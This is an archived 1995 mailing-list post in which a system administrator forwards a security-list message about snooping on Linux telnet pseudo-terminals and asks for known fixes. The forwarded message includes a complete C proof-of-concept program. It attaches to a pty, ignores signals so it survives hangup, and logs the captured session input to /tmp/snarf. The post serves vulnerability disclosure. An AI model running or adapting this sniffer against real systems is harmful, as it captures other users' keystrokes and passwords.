[Prev][Next][Index]

Linux tty Surfing ... any1 had problems with it ?!



Got this on the mail,
did anyone had any problems with it ? 
Any known fixes ?

Forwarded message:
> Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id CAA26655
>   (8.6.12/IDA-1.6); Wed, 27 Sep 1995 02:58:06 +1000
> Received: (majordom@localhost) by suburbia.net (8.6.12/Proff-950810) id XAA10939 for best-of-security-outgoing; Tue, 26 Sep 1995 23:08:07 +1000
> Received: (proff@localhost) by suburbia.net (8.6.12/Proff-950810) id XAA10930 for best-of-security; Tue, 26 Sep 1995 23:07:49 +1000
> Date: Tue, 26 Sep 1995 23:07:49 +1000
> From: Julian Assange <proff@suburbia.net>
> Message-Id: <199509261307.XAA10930@suburbia.net>
> To: best-of-security@suburbia.net
> Subject: BoS: linux tty surfing
> Sender: owner-best-of-security@suburbia.net
> Errors-to: nobody@connect.com.au
> Reply-To: nobody@connect.com.au
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> Hi all,
> 
> I've done some more testing on this, and got the following results
> with 1.2.10 (yeah, I'm not really on the bleeding edge):
> 
>         * telnetd as of NetKit-0.5 does not protect you from anyone
>           snooping on your pty. I guess we know that by now.
>           There's some code in sys_term.c that does a vhangup on the
>           pty, but it's commented out for Linux. The comment says that
>           this appears to be buggy
> 
>         * Using login from util-linux-2.2 helps a bit. If you do a
>           cat /dev/ttyp0, it will terminate once login is executed by
>           telnetd. That's because login *does* do a vhangup.
> 
>         * Unfortunately, this is not the end of it. I experimented
>           a little, and found that a program that ignores all signals
>           *and* makes the pty its controlling tty will happily live on,
>           and is still able to read data from it. I'm including it
>           below.
> 
>           What I do not understand is why this does not make telnetd
>           fail when doing an ioctl(TIOCSCTTY). Anyone more familiar with
>           this stuff may be able to shed some light on this (Ted?).
> 
> Olaf
> - --
> Olaf Kirch         |  --- o --- Nous sommes du soleil we love when we play
> okir@monad.swb.de  |    / | \   sol.dhoop.naytheet.ah kin.ir.samse.qurax
>              For my PGP public key, finger okir@brewhq.swb.de.
> - ------------------------------------------------------------------
> /*
>  * simple test program for. Not my usual standard of coding...
>  */
> #include <stdio.h>
> #include <unistd.h>
> #include <signal.h>
> #include <termios.h>
> #include <sys/types.h>
> #include <sys/fcntl.h>
> 
> int
> main(int argc, char **argv)
> {
>         char    buffer[256];
>         FILE    *fp;
>         int     fd, i, n;
> 
>         for (i = 0; i < 256; i++)
>                 close(i);
>         setsid();
>         if ((fd = open(argv[1], O_RDWR)) < 0) {
>                 perror("open");
>                 return 2;
>         }
>         if (ioctl(fd, TIOCSCTTY, NULL) < 0)
>                 perror("ioctl");
>         if ((fp = fopen("/tmp/snarf", "w")) == NULL)
>                 return 2;
>         for (i = 0; i < 32; i++)
>                 signal(i, SIG_IGN);
>         while ((n = read(fd, buffer, 255)) > 0) {
>                 buffer[n] = 0;
>                 fprintf(fp, "got %s\n", buffer);
>         }
>         perror("read");
>         return 2;
> }
> 
> --
> 
> 
> did I say, "dumb."
> 


-- 

Oren Poleg, 				Work: (972)-3-5750570
System Administrator			Home: (972)-9-919678

Euronet Communications			http://www.euronet.co.il/~poleg


			Public key available on finger